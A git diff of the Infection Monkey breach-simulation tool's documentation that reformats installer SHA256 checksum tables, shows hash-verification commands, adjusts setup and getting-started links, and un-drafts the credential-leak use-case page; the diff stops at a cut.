diff --git a/.gitmodules b/.gitmodules index b77ba5a43..714716a9b 100644 --- a/.gitmodules +++ b/.gitmodules @@ -4,4 +4,4 @@ url = https://github.com/guardicore/cti [submodule "docs/themes/learn"] path = docs/themes/learn - url = https://github.com/ShayNehmad/hugo-theme-learn.git + url = https://github.com/guardicode/hugo-theme-learn.git diff --git a/docs/content/setup/_index.md b/docs/content/setup/_index.md index e6493bbac..bc114f2e4 100644 --- a/docs/content/setup/_index.md +++ b/docs/content/setup/_index.md @@ -20,3 +20,7 @@ Once you're done setting the Monkey up, check out our [Getting Started](../usage {{% notice tip %}} You can find information about [operating system compatibility and support here](../reference/operating_systems_support). {{% /notice %}} + +{{% notice tip %}} +You can find the binary checksums of our installers to verify their integrity [in this page](../usage/file-checksums). +{{% /notice %}} \ No newline at end of file diff --git a/docs/content/usage/file-checksums.md b/docs/content/usage/file-checksums.md index 803c6a8ec..9c09f570f 100644 --- a/docs/content/usage/file-checksums.md +++ b/docs/content/usage/file-checksums.md @@ -20,7 +20,7 @@ Get-FileHash '.\Monkey Island v1.8.2_3536_windows.exe' | Format-List # Should print # Algorithm : SHA256 # Hash : 2BE528685D675C882604D98382ADB739F5BA0A7E234E3569B21F535173BD9569 -# Path : C:\Users\shay.nehmad\Desktop\work\compiled monkeys\1.8.2\Monkey Island v1.8.2_3536_windows.exe +# Path : C:\Users\shay.nehmad\Desktop\work\compiled monkeys\1.8.2\Monkey Island v1.8.2_3536_windows.exe <-- Your path will be different ``` ### On Linux @@ -28,51 +28,151 @@ Get-FileHash '.\Monkey Island v1.8.2_3536_windows.exe' | Format-List Use the `sha256sum` shell command, like so: ```sh -sha256sum monkey-linux-64 +$ sha256sum monkey-linux-64 # Should print: # 734dd2580f3d483210daf54c063a0a972911bbe9afb6ebc6278f86cd6b05e7ab monkey-linux-64 ``` ## Latest version checksums -| Filename | Type | Version | SHA256 hash | -|-|-|-|-| -monkey-windows-64.exe | Windows Agent | 1.9.0 | `24622cb8dbabb0cf4b25ecd3c13800c72ec5b59b76895b737ece509640d4c068` -monkey-windows-32.exe | Windows Agent | 1.9.0 | `67f12171c3859a21fc8f54c5b2299790985453e9ac028bb80efc7328927be3d8` -monkey-linux-64 | Linux Agent | 1.9.0 | `aec6b14dc2bea694eb01b517cca70477deeb695f39d40b1d9e5ce02a8075c956` -monkey-linux-32 | Linux Agent | 1.9.0 | `4c24318026239530ed2437bfef1a01147bb1f3479696eb4eee6009326ce6b380` -infection_monkey_deb.tgz | Debian Package | 1.9.0 | `33c23ddae283e3aafe965d264bc88464b66db3dd6874fd7e5cbcd4e931b3bb25` -infection_monkey_debzt.tgz | Debian Package | 1.9.0 | `cc53fe9632f44248357d6bd20cf8629be9baf8688468fa6d3e186dcebf10cef6` -Monkey Island v1.9.0_3546_windows.exe | Windows Installer | 1.9.0 | `371f6d25e8cb16ea7ebdfd367092ee65b33db2ec35b44d96705716641eaa59e8` -Monkey Island v1.9.0_3546_windowszt.exe | Windows Installer | 1.9.0 | `662c611fb83bb8c7ef5f99c5d5ae04f5758727c688238d6a3cd4c58675581695` -infection_monkey_docker_docker_20200806_153913.tgz | Docker | 1.9.0 | `5da11c539045a395ced5dd572d331c4f0e9315a3ee192c06279ff4fef668b96e` -infection_monkey_docker_dockerzt_20200806_154742.tgz | Docker | 1.9.0 | `a84dbaad32ae42cc2d359ffbe062aec493a7253cf706a2d45f0d0b1c230f9348` -monkey-island-vmware.ova | OVA | 1.9.0 | `3861d46518e8a92e49992b26dbff9fe8e8a4ac5fd24d68e68b13e7fd3fa22247` -monkey-island-vmwarezt.ova | OVA | 1.9.0 | `03d356eb35e6515146f5bd798bb62cb15c56fcdf83a5281cf6cdc9b901586026` +| Filename | Type | Version | SHA256 | +|------------------------------------------------------|-------------------|---------|--------------------------------------------------------------------| +| monkey-windows-64.exe | Windows Agent | 1.9.0 | `24622cb8dbabb0cf4b25ecd3c13800c72ec5b59b76895b737ece509640d4c068` | +| monkey-windows-32.exe | Windows Agent | 1.9.0 | `67f12171c3859a21fc8f54c5b2299790985453e9ac028bb80efc7328927be3d8` | +| monkey-linux-64 | Linux Agent | 1.9.0 | `aec6b14dc2bea694eb01b517cca70477deeb695f39d40b1d9e5ce02a8075c956` | +| monkey-linux-32 | Linux Agent | 1.9.0 | `4c24318026239530ed2437bfef1a01147bb1f3479696eb4eee6009326ce6b380` | +| infection_monkey_deb.tgz | Debian Package | 1.9.0 | `33c23ddae283e3aafe965d264bc88464b66db3dd6874fd7e5cbcd4e931b3bb25` | +| infection_monkey_debzt.tgz | Debian Package | 1.9.0 | `cc53fe9632f44248357d6bd20cf8629be9baf8688468fa6d3e186dcebf10cef6` | +| Monkey Island v1.9.0_3546_windows.exe | Windows Installer | 1.9.0 | `371f6d25e8cb16ea7ebdfd367092ee65b33db2ec35b44d96705716641eaa59e8` | +| Monkey Island v1.9.0_3546_windowszt.exe | Windows Installer | 1.9.0 | `662c611fb83bb8c7ef5f99c5d5ae04f5758727c688238d6a3cd4c58675581695` | +| infection_monkey_docker_docker_20200806_153913.tgz | Docker | 1.9.0 | `5da11c539045a395ced5dd572d331c4f0e9315a3ee192c06279ff4fef668b96e` | +| infection_monkey_docker_dockerzt_20200806_154742.tgz | Docker | 1.9.0 | `a84dbaad32ae42cc2d359ffbe062aec493a7253cf706a2d45f0d0b1c230f9348` | +| monkey-island-vmware.ova | OVA | 1.9.0 | `3861d46518e8a92e49992b26dbff9fe8e8a4ac5fd24d68e68b13e7fd3fa22247` | +| monkey-island-vmwarezt.ova | OVA | 1.9.0 | `03d356eb35e6515146f5bd798bb62cb15c56fcdf83a5281cf6cdc9b901586026` | ## Older checksums -| Filename | Type | Version | SHA256 hash | -|-|-|-|-| -monkey-windows-64.exe | Windows Agent | 1.8.2 | `2e6a1cb5523d87ddfd48f75b10114617343fbac8125fa950ba7f00289b38b550` -monkey-windows-32.exe | Windows Agent | 1.8.2 | `86a7d7065e73b795e38f2033be0c53f3ac808cc67478aed794a7a6c89123979f` -monkey-linux-64 | Linux Agent | 1.8.2 | `4dce4a115d41b43adffc11672fae2164265f8902267f1355d02bebb802bd45c5` -monkey-linux-32 | Linux Agent | 1.8.2 | `39d3fe1c7b33482a8cb9288d323dde17b539825ab2d736be66a9582764185478` -infection_monkey_deb.tgz | Debian Package | 1.8.2 | `2a6b4b9b846566724ff985c6cc8283222b981b3495dd5a8920b6bc3f34d556e2` -Monkey Island v1.8.2_3536_windows.exe | Windows Installer | 1.8.2 | `2be528685d675c882604d98382adb739f5ba0a7e234e3569b21f535173bd9569` -Monkey Island v1.8.2_3536_windowszt.exe | Windows Installer | 1.8.2 | `f282ce4dd50abe54671948fb5b3baf913087459444e451660971290a72fe244a` -infection_monkey_docker_docker_20200607_172156.tgz | Docker | 1.8.2 | `0e4bc731ef7e8bf19b759709672375890136c008526be454850d334d9ba5012d` -infection_monkey_docker_dockerzt_20200607_172521.tgz | Docker | 1.8.2 | `0f4b0cd6fd54dc14ea50c5d2fb3fc711e9863518bd5bffd04e08a0f17eb99e75` -monkey-windows-64.exe | Windows Agent | 1.8.0 | `f0bc144ba4ff46094225adaf70d3e92e9aaddb13b59e4e47aa3c2b26fd7d9ad7` -monkey-windows-32.exe | Windows Agent | 1.8.0 | `1ddb093f9088a4d4c0af289ff568bbe7a0d057e725e6447055d4fe6c5f4e2c08` -monkey-linux-64 | Linux Agent | 1.8.0 | `d41314e5df72d5a470974522935c0b03dcb1c1e6b094d4ab700b04d5fec59ae6` -monkey-linux-32 | Linux Agent | 1.8.0 | `217cc2b9481f6454fa0a13adf12d9b29ce4e1e6a319971c8db9b446952ce3fb2` -infection_monkey_deb.tgz | Debian Package | 1.8.0 | `9c5254583ce786768ea55df8063152bd19e0f21a83e6f4f873c5dccc5a1c9d5e` -infection_monkey_debzt.tgz | Debian Package | 1.8.0 | `90A0824EC98680944B15B86CF5CFA09D48EDA406300C4CAE54432DB05F486D07` -Monkey Island v1.8.0_3513_windows.exe | Windows Installer | 1.8.0 | `ce9a9d0539c14ebe2a10cf3b36991b309abd7b62dd7fb7522a549d8987b0f0f4` -Monkey Island v1.8.0_3514_windowszt.exe | Windows Installer | 1.8.0 | `0b535a802ac43455d702b45673859b940c1feb7702b46a6a2cbc699672b0c89d` -infection_monkey_docker_docker_20200330_201419.tgz | Docker | 1.8.0 | `4f15a5008e43d8c5184456771dd9e8d70104b4ec79e34b53d230662604a7d190` -infection_monkey_docker_dockerzt_20200401_174529.tgz | Docker | 1.8.0 | `d94404134d879f3d859c77454df4abd0dbca00b8cae4b1c52d3b38e847f34e4c` -monkey-island-vmware.ova | OVA | 1.8.0 | `6BC4E85A0EA81045BD88E2D5A9F98F0DD40DE99E94D1E343D13FA418045A6915` -monkey-island-vmwarezt.ova | OVA | 1.8.0 | `79A043D85521F94024F8B0428A7A33B4D3F5B13F9D2B83F72C73C8D0BB12ED91` +| Filename | Type | Version | SHA256 | +|------------------------------------------------------|-------------------|---------|--------------------------------------------------------------------| +| monkey-windows-64.exe | Windows Agent | 1.8.2 | `2e6a1cb5523d87ddfd48f75b10114617343fbac8125fa950ba7f00289b38b550` | +| monkey-windows-32.exe | Windows Agent | 1.8.2 | `86a7d7065e73b795e38f2033be0c53f3ac808cc67478aed794a7a6c89123979f` | +| monkey-linux-64 | Linux Agent | 1.8.2 | `4dce4a115d41b43adffc11672fae2164265f8902267f1355d02bebb802bd45c5` | +| monkey-linux-32 | Linux Agent | 1.8.2 | `39d3fe1c7b33482a8cb9288d323dde17b539825ab2d736be66a9582764185478` | +| infection_monkey_deb.tgz | Debian Package | 1.8.2 | `2a6b4b9b846566724ff985c6cc8283222b981b3495dd5a8920b6bc3f34d556e2` | +| Monkey Island v1.8.2_3536_windows.exe | Windows Installer | 1.8.2 | `2be528685d675c882604d98382adb739f5ba0a7e234e3569b21f535173bd9569` | +| Monkey Island v1.8.2_3536_windowszt.exe | Windows Installer | 1.8.2 | `f282ce4dd50abe54671948fb5b3baf913087459444e451660971290a72fe244a` | +| infection_monkey_docker_docker_20200607_172156.tgz | Docker | 1.8.2 | `0e4bc731ef7e8bf19b759709672375890136c008526be454850d334d9ba5012d` | +| infection_monkey_docker_dockerzt_20200607_172521.tgz | Docker | 1.8.2 | `0f4b0cd6fd54dc14ea50c5d2fb3fc711e9863518bd5bffd04e08a0f17eb99e75` | +| monkey-windows-64.exe | Windows Agent | 1.8.0 | `f0bc144ba4ff46094225adaf70d3e92e9aaddb13b59e4e47aa3c2b26fd7d9ad7` | +| monkey-windows-32.exe | Windows Agent | 1.8.0 | `1ddb093f9088a4d4c0af289ff568bbe7a0d057e725e6447055d4fe6c5f4e2c08` | +| monkey-linux-64 | Linux Agent | 1.8.0 | `d41314e5df72d5a470974522935c0b03dcb1c1e6b094d4ab700b04d5fec59ae6` | +| monkey-linux-32 | Linux Agent | 1.8.0 | `217cc2b9481f6454fa0a13adf12d9b29ce4e1e6a319971c8db9b446952ce3fb2` | +| infection_monkey_deb.tgz | Debian Package | 1.8.0 | `9c5254583ce786768ea55df8063152bd19e0f21a83e6f4f873c5dccc5a1c9d5e` | +| infection_monkey_debzt.tgz | Debian Package | 1.8.0 | `90A0824EC98680944B15B86CF5CFA09D48EDA406300C4CAE54432DB05F486D07` | +| Monkey Island v1.8.0_3513_windows.exe | Windows Installer | 1.8.0 | `ce9a9d0539c14ebe2a10cf3b36991b309abd7b62dd7fb7522a549d8987b0f0f4` | +| Monkey Island v1.8.0_3514_windowszt.exe | Windows Installer | 1.8.0 | `0b535a802ac43455d702b45673859b940c1feb7702b46a6a2cbc699672b0c89d` | +| infection_monkey_docker_docker_20200330_201419.tgz | Docker | 1.8.0 | `4f15a5008e43d8c5184456771dd9e8d70104b4ec79e34b53d230662604a7d190` | +| infection_monkey_docker_dockerzt_20200401_174529.tgz | Docker | 1.8.0 | `d94404134d879f3d859c77454df4abd0dbca00b8cae4b1c52d3b38e847f34e4c` | +| monkey-island-vmware.ova | OVA | 1.8.0 | `6BC4E85A0EA81045BD88E2D5A9F98F0DD40DE99E94D1E343D13FA418045A6915` | +| monkey-island-vmwarezt.ova | OVA | 1.8.0 | `79A043D85521F94024F8B0428A7A33B4D3F5B13F9D2B83F72C73C8D0BB12ED91` | +| monkey-linux-64 | Debian Package | 1.8.0 | `b0de3931f6b9c2d986860151e5094e4c57aafa5e3e4aced828ecba36e4ece851` | +| infection_monkey_docker_docker_20200330_201419.tgz | Docker | 1.8.0 | `4f15a5008e43d8c5184456771dd9e8d70104b4ec79e34b53d230662604a7d190` | +| Monkey Island v1.8.0_3513_windows.exe | Windows Installer | 1.8.0 | `ce9a9d0539c14ebe2a10cf3b36991b309abd7b62dd7fb7522a549d8987b0f0f4` | +| monkey-windows-64.exe | Windows Agent | 1.8.0 | `f0bc144ba4ff46094225adaf70d3e92e9aaddb13b59e4e47aa3c2b26fd7d9ad7` | +| monkey-linux-64 | Linux Agent | 1.8.0 | `d41314e5df72d5a470974522935c0b03dcb1c1e6b094d4ab700b04d5fec59ae6` | +| monkey-windows-32.exe | Windows Agent | 1.8.0 | `1ddb093f9088a4d4c0af289ff568bbe7a0d057e725e6447055d4fe6c5f4e2c08` | +| monkey-linux-32 | Linux Agent | 1.8.0 | `217cc2b9481f6454fa0a13adf12d9b29ce4e1e6a319971c8db9b446952ce3fb2` | +| infection_monkey_deb.tgz | Debian Package | 1.8.0 | `9c5254583ce786768ea55df8063152bd19e0f21a83e6f4f873c5dccc5a1c9d5e` | +| infection_monkey_debzt.tgz | Debian Package | 1.8.0 | `90A0824EC98680944B15B86CF5CFA09D48EDA406300C4CAE54432DB05F486D07` | +| infection_monkey_docker_docker_20200401_174048.tgz | Docker | 1.8.0 | `ae59b222a94e1ec83a1c36917bc5cd3d119057e146ac01242af91808f3dce37a` | +| infection_monkey_docker_dockerzt_20200401_174529.tgz | Docker | 1.8.0 | `d94404134d879f3d859c77454df4abd0dbca00b8cae4b1c52d3b38e847f34e4c` | +| Monkey Island v1.8.0_3514_windows.exe | Windows Installer | 1.8.0 | `a56bd98ca3d0dd260f26ac5ee46022fd5ca3f9081a43535b4f57cef43c345dc0` | +| Monkey Island v1.8.0_3514_windowszt.exe | Windows Installer | 1.8.0 | `0b535a802ac43455d702b45673859b940c1feb7702b46a6a2cbc699672b0c89d` | +| Monkey Island v1.8.0_3516_windows.exe | Windows Installer | 1.8.0 | `a31a3837d8ca722e8db10148704237b032e5ef62acc080a82ab80f009d8de6bd` | +| Monkey Island v1.8.0_3517_windows.exe | Windows Installer | 1.8.0 | `450e9ea58a5282f506f819bdc3d4477bbc917d74ee837ca0cc3e62b4a923fef1` | +| Monkey Island v1.8.0_3519_windows.exe | Windows Installer | 1.8.0 | `dfaf7b11b148a5648ca92887d731633f85b68dc82313616f0009eee123c47352` | +| Monkey Island v1.8.0_3520_windows.exe | Windows Installer | 1.8.0 | `719427a7f1878555d6940485330f51e2ddb3331c96b60a1719f6e21987efb3d3` | +| Monkey Island v1.8.0_3521_windows.exe | Windows Installer | 1.8.0 | `a9a37ec2677fc7d224c5993f914ba402c9f86c2f909dc5d649f67d08802dc847` | +| Monkey Island v1.8.0_3522_windows.exe | Windows Installer | 1.8.0 | `4aaa5a99a108ab3cb14b9268a32ac68cb2de4a001ae0e4374ca779824981ea64` | +| Monkey Island v1.8.0_3523_windows.exe | Windows Installer | 1.8.0 | `4f029d2683cf68e63f8b426fa19df9561add0ed169821b4fc83c2721f0939520` | +| Monkey Island v1.8.0_3525_windows.exe | Windows Installer | 1.8.0 | `4a660cf5eda5beae844e5a62031972304eaa0432c32708f11d94dc0a501be182` | +| Monkey Island v1.8.0_3525_windowszt.exe | Windows Installer | 1.8.0 | `980ba04ef9f6395e2885851f906ee3ed57d696a2e984aa1e7a59446a57ce0408` | +| infection_monkey_docker_docker_20200419_160310.tgz | Docker | 1.8.0 | `999edc833484f51475db5a56e0557b59d09f520453b8077c60f7d9359b504299` | +| infection_monkey_docker_dockerzt_20200419_160542.tgz | Docker | 1.8.0 | `87ec632837d4add968831ee7fd271871f89e5b29e251d046ebf100bc94bb755e` | +| Monkey Island v1.8.0_3526_windows.exe | Windows Installer | 1.8.0 | `6b6c05f3575eef9b95c1624f74953e54654211de4ae1ad738b287e661f002989` | +| Monkey Island v1.8.0_3526_windowszt.exe | Windows Installer | 1.8.0 | `f181e58820817d76274fab3ee2a7824fc0d5b1f637d7f5c7fe111eb7061844f2` | +| Monkey Island v1.8.0_3527_windows.exe | Windows Installer | 1.8.0 | `94c2e09ca103bc22206715783616af91e58fe773a04c975d6a09d48d9a5759b2` | +| infection_monkey_docker_docker_20200420_151527.tgz | Docker | 1.8.0 | `fe4512fd46c3be6c9416287e3a703e8453a46a17b05404ba72035036946f6dbd` | +| infection_monkey_docker_docker_20200420_153306.tgz | Docker | 1.8.0 | `17ef5de58a49168a70085cb80063355ac489139c88d029d175a09e36524fe224` | +| infection_monkey_docker_docker_20200420_174533.tgz | Docker | 1.8.0 | `fcf57ab8b1b77bcf678765c90798b950fd4a62019c48ebeeac37e9d3011b6b2e` | +| infection_monkey_docker_docker_20200427_184208.tgz | Docker | 1.8.0 | `082165abd8c45d9731472ae0877fecedfbcefcff8c0003b43d4300854908f0cb` | +| infection_monkey_docker_dockerzt_20200427_184441.tgz | Docker | 1.8.0 | `74f824ecb14f5d47182156999d5aeaf2177d719c6f53ed81b68606b2ed931647` | +| Monkey Island v1.8.0_3528_windows.exe | Windows Installer | 1.8.0 | `baa13321c88223acd0262137ba018f9cbea869b5d1920565a5e6c8eb2c83b80e` | +| Monkey Island v1.8.0_3528_windowszt.exe | Windows Installer | 1.8.0 | `466f7c3aa052163f10e154ec787b31a98b54ced8cffc17373525e8ca39ec2556` | +| monkey-island-vmware.ova | OVA | 1.8.0 | `6BC4E85A0EA81045BD88E2D5A9F98F0DD40DE99E94D1E343D13FA418045A6915` | +| monkey-island-vmwarezt.ova | OVA | 1.8.0 | `79A043D85521F94024F8B0428A7A33B4D3F5B13F9D2B83F72C73C8D0BB12ED91` | +| monkey_island_vmware.deb | VMWare Debian | 1.7.0 | `8F77347343B1D070C4BCC43A6CF5971F086665206F76AD1304359ADB388C55DE` | +| dk.monkeyisland.latest.tar | Docker | 1.7.0 | `E92CD45DB172342FE906FEFA7F26BACB2F59C2BE8484756B71CD1BDEBCCA8BFB` | +| monkey-windows-32.exe | Agent | 1.7.0 | `00E121EC8AA3519498D225066A3BC29984A7DA2A6F4F0641ED465FD64107A117` | +| Monkey Island v1.7.0.3478.exe | Windows Installer | 1.7.0 | `AFC969884939DBE37DA6B8AD4999CA6E9F18E54BA03AC0C04C59ABB6D6204634` | +| monkey_island.deb | Debian | 1.7.0 | `4AE051BC47B39FA05937994B3D24226771D03891AB2EA484FD7B4AADC0C5E220` | +| monkey-windows-64.exe | Agent | 1.7.0 | `BCF60E0C4BC2578361CCACDA0C183B726AF375F0142306CA9013A14BBA9B962C` | +| monkey-linux-64 | Agent | 1.7.0 | `333529B3061473BF5EE713FA7E3DF4B05DD01823840BB92E1E715488A749B9EA` | +| monkey-linux-32 | Agent | 1.7.0 | `EF7A72FFDDF3A54C74F458201A45B51B779A68C460A309B0D5FD247264D7137D` | +| Monkey Island 1.7.0 OVA 20191013.ova | OVA | 1.7.0 | `EB1D568F1EA9236B3402A65484EE1F06350FF5C4097288F3FE3312474ECB48C7` | +| dk.monkeyisland.latest.zt.tar | Docker | 1.7.0 | `C998FD7CC73F394CD39450E49586397F721D8B7F2DFA4CFE30EC797864588C72` | +| Monkey Island v1.7.0 zt.exe | Windows Installer | 1.7.0 | `5C6DADDD3BCF0766DB515DC911DC80D7D11DFF8A72BCBBBE21DEB3C9F78B6889` | +| monkey_island_zt.deb | Debian | 1.7.0 | `A0515FBCFD9590CEA739E1AFA95CE7FC406C5E4206A67A50C8CD2423540818C8` | +| monkey_island_vmware_zt.deb | VMWare Debian | 1.7.0 | `80EDB3FB846251C7B80B72259837629F17A4166C34FE440451BDD7ED8CC43F7F` | +| Monkey Island 1.7.0 ZT OVA 20191013.ova | OVA | 1.7.0 | `D220E171CF38DCD434AB4473C72CE29873A495B16FFAA8CA55658F5606398E34` | +| infection_monkey_deb_vmware.20190519_125330.tgz | VMWare | 1.6.3 | `22e51f089e6537e2cb349b07b4bf22c7a63c68ae12776a7b5239a0238bf02a05` | +| infection_monkey_deb_gcp.20190519_125239.tgz | GCP | 1.6.3 | `b8fdb976af8130329265bd3ad36b553864f6f7a2a2df912cfea4215584774686` | +| infection_monkey_docker.20190519_125632.tgz | Docker | 1.6.3 | `5576e20fe8ee502a7b452b504789961aedae214e49061a58ca0f248cc72c1c78` | +| monkey-windows-32.exe | Agent | 1.6.3 | `6f68d436a2a85852b02e4d72d4202919753a78e5285c36bd1a5481c8711b1d6b` | +| Monkey Island v1.6.3.3468.exe | Windows Installer | 1.6.3 | `69cb63612855165db97eb3c253e5a6f627fe216e0610eca5e5e6f875281a3604` | +| infection_monkey_deb.20190519_124555.tgz | Debian | 1.6.3 | `2389b553bd569defa4b81053984f0743b1b4093cdcfcf8561243b9d882d55e83` | +| monkey-windows-64.exe | Agent | 1.6.3 | `502c749ede6e09b8c40bc4bbfd2a46c95d3626a1aef74c72ac7b5641595e8c9c` | +| monkey-linux-64 | Agent | 1.6.3 | `6cfec4aea2f993294ca32f816a85347be8b155fb9c39706c82866bce8d8f87c1` | +| monkey-linux-32 | Agent | 1.6.3 | `996b3883e9b1114b274bf25426ee13060b65f8deb08c96b57857b99d8e8e3277` | +| Infection Monkey 1.6.3.ova | OVA | 1.6.3 | `a5b6e7d547ad4ae79508301698d99cbaf3b3ebfb1d2f0274ae1151d803def1e4` | +| infection_monkey_deb_azure.20190519_125317.tgz | Azure | 1.6.3 | `fcf1b6bf805f4422deb90f25752573f796d5a73e148086f49db310208b02c829` | +| infection_monkey_deb_aws.20190519_130517.tgz | AWS | 1.6.3 | `9c232f5d2f9dc24c9faea3cf597af783798baedb61334e0e650ca79bdac29fec` | +| Infection Monkey 1.6.2.ova | OVA | 1.6.2 | `00346E6383E7BBDB107C14B668D251513E150C089A26AAFA3E17040D96C7DEC9` | +| infection_monkey_deb.1.6.2.tgz | Debian | 1.6.2 | `56BF1D99DD6674F9D3504D5DD5A62D8B3520B4F25449ED0026E5A0DC99BD0683` | +| infection_monkey_1.5_docker.tgz | Docker | 1.6.2 | `2466B4FFFE175EC5DEF0CAACF93EE5CC7D8878DBA63B30F148C560A6AFA5B537` | +| Monkey Island v1.6.2.3434.exe | Windows Installer | 1.6.2 | `2B0BFD5721897787536F4F94D5641E061833CBEF0279C0E38C41BC1B3E76A380` | +| Monkey-Linux-32 | Agent | 1.6.1 | `9E5F8FA7F85FEB1BC31E0AE7D1F303139CA3FE5FA044E6C58F68B4917D27CACE` | +| Monkey-Linux-64 | Agent | 1.6.1 | `74F9FFBB504FF5E74EFF1399685C0C110EDE0D3244F61591D77EE7A22672457E` | +| Monkey-Windows-32.exe | Agent | 1.6.1 | `53AC0F047CA95A0476944559F6FC650ADA865891139FA1258B35A5A525BC6002` | +| Monkey-Windows-64.exe | Agent | 1.6.1 | `53019FD25CD4A0AE526696EB05E2EEDE32607263C5F29BE36554D637532D41C3` | +| infection_monkey_1.5.2.ova | OVA | 1.5.2 | `6E6CAABBA7CCDB20E981147560353EC731B1FC8955D0319886D36E9825C201C7` | +| infection_monkey_1.5_deb.tgz | Debian | 1.5.2 | `E84EFA3C20A417D13DC6EA64CB046D40ED7534A6FBB91EBF6EA061716A855A17` | +| infection_monkey_1.5_docker.tgz | Docker | 1.5.2 | `0D33C17556FAC28874A2FE9157DB311892B42669E51C043C4DAE2F68B0D74B8F` | +| Monkey-Linux-32 | Agent | 1.5.2 | `4DF689A845FD7092E81ECB0AB5207621836B3D46B71FB3829E5E5CF9DDAF52D0` | +| Monkey-Linux-64 | Agent | 1.5.2 | `99FC4BB24D2EFF1CD107CCE932EA0BDC006ED2226AE0DC19DD0BC7A97ADB553F` | +| Monkey-Windows-32.exe | Agent | 1.5.2 | `8FC1441B87BDFD786A3A262542C013E4C84AC870C847A919CDA0851F91A511B9` | +| Monkey-Windows-64.exe | Agent | 1.5.2 | `0AE8F0AB190E8BEAE78AB12C8477C924FE92B19B1E079B279F4F87AE4BD2A718` | +| infection_monkey_deb.20180402_184213.tgz | Debian | 1.5.1 | `4425FC97DE825715837783258FD8BCF88E87AAB3500F63D287384B9D74D54122` | +| Monkey Island v1.5.1.3377.exe | Windows Installer | 1.5.1 | `5A137ADA97F39F4C3CA278E851D2684B929911639E2876EB4DF1D1AC5D70E27D` | +| infection_monkey_docker.20180402_184212.tgz | Docker | 1.5.1 | `049831C3F9C959128C5C8D9843819A4ED960FF046B1536216B5FA5FF4B28D1A6` | +| Monkey-Linux-32 | Agent | 1.6 | `665E1263347B9D0245211676496E91669809B3865ED8B5AD1878DA54A9784F5C` | +| Monkey-Linux-64 | Agent | 1.6 | `F0D51E7431CF07A842D4D25AAE2DD8A6B9EE08744914729AF448F92088798F7F` | +| Monkey-Windows-32.exe | Agent | 1.6 | `77AC4264715A6E7D238F8B67ED04EE75CF75C07D360A4B649CA6E31C83CE7B21` | +| Monkey-Windows-64.exe | Agent | 1.6 | `0DEED0AA00F7D54B084EF6888731B0CFEC6382045A74B55162FDD3D00D0BE9F8` | +| Monkey Island v1.6.0.3414.exe | Windows installer | 1.6 | `242879983A709D7CD6D7D7EEC493442B7FACC8E215CBB21650915C5EECB8829A` | +| infection_monkey_1.6.ova | OVA | 1.6 | `831FBA09AA49940B1747164BEB6B4AF83BA04FCE35285912AB0B18A7FA1A39D8` | +| infection_monkey_deb.1.6.tgz | Debian | 1.6 | `339EC88DD6A2AB6CB917456AA8970B0F1D36D7335E7D2EE1A34B74047F843542` | +| infection_monkey_docker.1.6.tgz | Docker | 1.6 | `0624CF75C4D208DDC7475636CFE2869BA324DEB88C3860DB2934E7BDA3E664F6` | +| infection_monkey.ova | OVA | 1.5 | `A6773C4DA8FF7A09C0F3FEE45A25D45830C616AACCEC14C86542462ADCDA1F89` | +| infection_monkey_deb.20180208_175917.tgz | Debian | 1.5 | `04E3CD3CD301A44BEE508C1BF993948B89212EF3269D61FB13ECB9FDC25268DB` | +| infection_monkey_docker.20180119_112852.tgz | Docker | 1.5 | `4D94C6BB7B4A0177CC1F3E864FB714015619ACB4DD1C4E92D8986BA093F8BD87` | +| Monkey Island v1.5.0.exe | Windows installer | 1.5 | `A1D7725AF116AE33CEA9A0E641E61C96E51FAFCCCB598F668EB99E35DE799C7B` | +| infection_monkey_1.5_deb.tgz | Debian | 1.5 | `1433B8A5E778F12C9E8AE4B1BCBF2863E0CC5E001D661C8540804B909B9D83C5` | +| infection_monkey_1.5_docker.tgz | Docker | 1.5 | `22B7FDC4C213F0385AEB9F63E60665470C2862C8C1B45B5B49FBF320570A9082` | +| Monkey Island v1.5.0.3371.exe | Windows Installer | 1.5 | `B69997E9920E73F16896D3E793AB721388E5636DB1846D4BFEC1C7A372EE2059` | +| infection_monkey_1.5_deb.tgz | Debian | 1.5 | `00EB499FCC590950723E42784D3502B70EAD8AD396B916AF450AB1A48DF993ED` | +| infection_monkey_1.5_docker.tgz | Docker | 1.5 | `A8670280A07EF6A9F5DC9CEB4B11B25DD7B90C37AD94666A6FFAABD6D105F0CB` | +| Monkey Island v1.5.0.exe | Windows Installer | 1.5 | `55F39C8EEB04089F54C10C991A82FE1539BC072E1A7F364D0C720CBF0A28EBB7` | +| Monkey-Linux-32 | Agent | 1.5 | `B85E10AEF0B6935B0AF6EFEA03C9A684859F2DD078B31D9492E98585E2E89C39` | +| Monkey-Linux-64 | Agent | 1.5 | `44BA13A7391D4A16C46D5EF44F60B09E1EDCEB3C716C0AF4241F166619A62944` | diff --git a/docs/content/usage/getting-started.md b/docs/content/usage/getting-started.md index 631957506..63d2bbaec 100644 --- a/docs/content/usage/getting-started.md +++ b/docs/content/usage/getting-started.md @@ -7,11 +7,13 @@ pre: " " tags: ["usage"] --- +If you haven't deployed the Monkey Island yet, please [refer to our setup documentation](/setup) + ## Using the Infection Monkey -After deploying the Monkey Island in your environment, navigate to `https://:5000`. +After deploying the Monkey Island in your environment, navigate to `https://:5000`. -### First-time setup +### First-time login On your first login, you'll be asked to set up a username and password for the Monkey Island server. [See this page for more details](../accounts-and-security). diff --git a/docs/content/usage/use-cases/_index.md b/docs/content/usage/use-cases/_index.md index 6595a50a6..389d5328a 100644 --- a/docs/content/usage/use-cases/_index.md +++ b/docs/content/usage/use-cases/_index.md @@ -8,7 +8,7 @@ pre = " " # Use cases -This section describes possible use cases for the "Infection Monkey" and helps to +This section describes possible use cases for the Infection Monkey and helps to understand how this tool can be configured. You can also refer to [our FAQ](../../faq) for more specific questions and answers. @@ -16,9 +16,6 @@ You can also refer to [our FAQ](../../faq) for more specific questions and answe No worries! The Monkey uses safe exploiters and does not cause any permanent system modifications that impact security or operations. {{% /notice %}} -#### Section contents: -- [Network breach](./network-breach) - Simulate internal network breach. -- [Network segmentation](./network-segmentation) - Test network segmentation. -- [Credential leak](./credential-leak) - Assess the impact of successful phishing attack or other form of credential leak. -- [IDS/IPS Test](./ids-test) - Test your network defence solutions. -- [Other](./other) - Tips and tricks about configuring monkey for your needs. +## Section contents + +{{% children description=True %}} diff --git a/docs/content/usage/use-cases/credential-leak.md b/docs/content/usage/use-cases/credential-leak.md index 77acd8d31..498e1ff54 100644 --- a/docs/content/usage/use-cases/credential-leak.md +++ b/docs/content/usage/use-cases/credential-leak.md @@ -1,7 +1,8 @@ --- title: "Credential Leak" date: 2020-08-12T13:04:25+03:00 -draft: true +draft: false +description: "Assess the impact of successful phishing attack, insider threat, or other form of credentials leak." weight: 4 --- diff --git a/docs/content/usage/use-cases/ids-test.md 